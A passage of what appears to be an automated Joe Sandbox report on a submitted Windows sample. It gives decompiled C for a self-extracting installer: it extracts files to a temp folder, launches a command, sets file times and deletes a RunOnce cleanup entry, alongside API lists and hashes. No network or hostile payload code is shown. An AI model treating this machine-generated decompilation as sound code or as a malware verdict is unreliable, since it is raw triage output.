                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-908790857
                                                                        • Opcode ID: a880be9368042dd675a7ddfeec57d8aa4eefef7f82b853e46b1dbbc556c15d20
                                                                        • Instruction ID: 98189190b16e9289eee41ee1f290c0685d5e1a8b9defc004ed498144134523bb
                                                                        • Opcode Fuzzy Hash: a880be9368042dd675a7ddfeec57d8aa4eefef7f82b853e46b1dbbc556c15d20
                                                                        • Instruction Fuzzy Hash: 22117871A012147BC7246F7A9C0DB9B7E9EEF85770F004615F586D31D0CAB4D805A6A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 f33fef-f34010 632 f34016-f3403b CreateProcessA 631->632 633 f3410a-f3411a call f36ce0 631->633 634 f34041-f3406e WaitForSingleObject GetExitCodeProcess 632->634 635 f340c4-f34101 call f36285 GetLastError FormatMessageA call f344b9 632->635 637 f34091 call f3411b 634->637 638 f34070-f34077 634->638 647 f34106 635->647 645 f34096-f340b8 CloseHandle * 2 637->645 638->637 641 f34079-f3407b 638->641 641->637 644 f3407d-f34089 641->644 644->637 648 f3408b 644->648 649 f340ba-f340c0 645->649 650 f34108 645->650 647->650 648->637 649->650 651 f340c2 649->651 650->633 651->647
                                                                        C-Code - Quality: 84%
                                                                        			E00F33FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E00F36CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0xf39124 = E00F36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E00F344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0xf38a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0xf39a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0xf39a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E00F3411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0xf39a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00F34033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F34049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00F3405C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F3409C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F340A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F340DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F340E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: eb43d500c385ca0d3b752f266ca7d8adacd913b2403c40f00ea6b526d6d0319a
                                                                        • Instruction ID: c25df76f331dcca531967b924d3af7143d325d137c56038c415b64efffdeb28a
                                                                        • Opcode Fuzzy Hash: eb43d500c385ca0d3b752f266ca7d8adacd913b2403c40f00ea6b526d6d0319a
                                                                        • Instruction Fuzzy Hash: 0931C271A4020CBBEB20AB65DC48FAB777DEB94730F1001A9F545D21A0C674AD85EF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 f351e5-f3520b call f3468f LocalAlloc 655 f3522d-f3523c call f3468f 652->655 656 f3520d-f35228 call f344b9 call f36285 652->656 662 f35262-f35270 lstrcmpA 655->662 663 f3523e-f35260 call f344b9 LocalFree 655->663 668 f352b0 656->668 666 f35272-f35273 LocalFree 662->666 667 f3527e-f3529c call f344b9 LocalFree 662->667 663->668 670 f35279-f3527c 666->670 674 f352a6 667->674 675 f3529e-f352a4 667->675 672 f352b2-f352b5 668->672 670->672 674->668 675->670
                                                                        C-Code - Quality: 100%
                                                                        			E00F351E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E00F3468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E00F3468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E00F344B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0xf39124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0xf39124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0xf39124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf39124 = E00F36285();
                                                                        				goto L10;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F32F4D,?,00000002,00000000), ref: 00F35201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F35250
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: b78f5ee1046be6326c34c8ddc196b97e01f7ea7e204786d3e0fa82b08e38b807
                                                                        • Instruction ID: a3f8a85adacdd360ba4c5a317066737590653766970583f59163a4bb6c80f3a1
                                                                        • Opcode Fuzzy Hash: b78f5ee1046be6326c34c8ddc196b97e01f7ea7e204786d3e0fa82b08e38b807
                                                                        • Instruction Fuzzy Hash: 6711C8B26046056FD3147B715C45F3B719EEBC9770F104429FA82E5191DABDEC017535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00F352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0xf391e0; // 0x9c7c60
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0xf38a24 == 0 &&  *0xf39a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0xf38a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0xf38a24 == 0 &&  *0xf39a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E00F31781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					if(( *0xf39a34 & 0x00000020) != 0) {
                                                                        						E00F365E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E00F32390( &_v268);
                                                                        					_t11 =  *0xf38a20; // 0x0
                                                                        				}
                                                                        				if( *0xf39a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E00F31FE1(_t22); // executed
                                                                        				}
                                                                        				 *0xf38a20 =  *0xf38a20 & 0x00000000;
                                                                        				return E00F36CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}













                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(009C7C60,00000080,?,00000000), ref: 00F352F2
                                                                        • DeleteFileA.KERNELBASE(009C7C60), ref: 00F352FA
                                                                        • LocalFree.KERNEL32(009C7C60,?,00000000), ref: 00F35305
                                                                        • LocalFree.KERNEL32(009C7C60), ref: 00F3530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(00F311FC,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F35363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F35334
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 2833751637-3217841213
                                                                        • Opcode ID: 9774ac1b927134ce6cfe381949b722dd6c2984fb4d50e60ac536c45a168e9414
                                                                        • Instruction ID: 0d94df3641f27b85a12556c4ee48eed2cf3e502862b95431fab0320f26a34eee
                                                                        • Opcode Fuzzy Hash: 9774ac1b927134ce6cfe381949b722dd6c2984fb4d50e60ac536c45a168e9414
                                                                        • Instruction Fuzzy Hash: 4621A131904608EBDB24AB20DD49BA977B6BB50BB0F040259F482972A0CFF99D85FB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F31FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        
                                                                        				if( *0xf38530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                        						return RegCloseKey(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}






                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00F3538C,?,?,00F3538C), ref: 00F32005
                                                                        • RegDeleteValueA.KERNELBASE(00F3538C,wextract_cleanup1,?,?,00F3538C), ref: 00F32017
                                                                        • RegCloseKey.ADVAPI32(00F3538C,?,?,00F3538C), ref: 00F32020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                        • API String ID: 849931509-1592051331
                                                                        • Opcode ID: 1ce379187f1102c8589abb00c0ec96bb87c8db7d528ae4463f98a776f1a18119
                                                                        • Instruction ID: fa3428b061593183e9fbb1fb0225df4a7a7b3e165edd3fb07acda3a2eacac69d
                                                                        • Opcode Fuzzy Hash: 1ce379187f1102c8589abb00c0ec96bb87c8db7d528ae4463f98a776f1a18119
                                                                        • Instruction Fuzzy Hash: 10E086B195031CBBD7298F91ED4AF5D7F2AF7007B0F140194F944A00A0EBB59E14F606
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F34CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0xf38004; // 0xc69e30f7
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0xf391d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E00F34E99(_t75);
                                                                        						L35:
                                                                        						return E00F36CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0xf38584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0xf391e4;
                                                                        						_t58 = 0xf391e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0xf391e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0xf391e4;
                                                                        						_t30 = E00F34702( &_v268, 0xf391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E00F3476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E00F34980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E00F347E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0xf393f4 =  *0xf393f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0xf391e4;
                                                                        						_t63 = 0xf391e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0xf391e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0xf391e4;
                                                                        						_t30 = E00F34702( &_v268, 0xf391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E00F34C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E00F34B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E00F34B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}
































                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00F34DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00F34DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 3625706803-3217841213
                                                                        • Opcode ID: 9c959cc6522ae589e984a9ab53e324524f8708f20003165f96e0d5555ed042a0
                                                                        • Instruction ID: 0f5e4a960bd690188966fdebccd34aa0994000d795f6e42372641869aecdd3f3
                                                                        • Opcode Fuzzy Hash: 9c959cc6522ae589e984a9ab53e324524f8708f20003165f96e0d5555ed042a0
                                                                        • Instruction Fuzzy Hash: F5414336A042058BCB259F38DC446B5B3A5FB45330F044668E88297695DF35FE8AFB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0xf38d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0xf38d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F34C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F34C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F34C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: f5357b7aa0f94f414bbe990df9474703414f504428703d4edeac594e3f949e94
                                                                        • Instruction ID: 32d7b7572633b7db43b9baf5adc057937b7832d4cb13ac17a07016b595d07400
                                                                        • Opcode Fuzzy Hash: f5357b7aa0f94f414bbe990df9474703414f504428703d4edeac594e3f949e94
                                                                        • Instruction Fuzzy Hash: 07F09073A0120CAF9B24EFB5CC48DBB77ADEB142B0B44052AB855C1050EA30FA14FBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F3487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E00F3490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}








                                                                        APIs
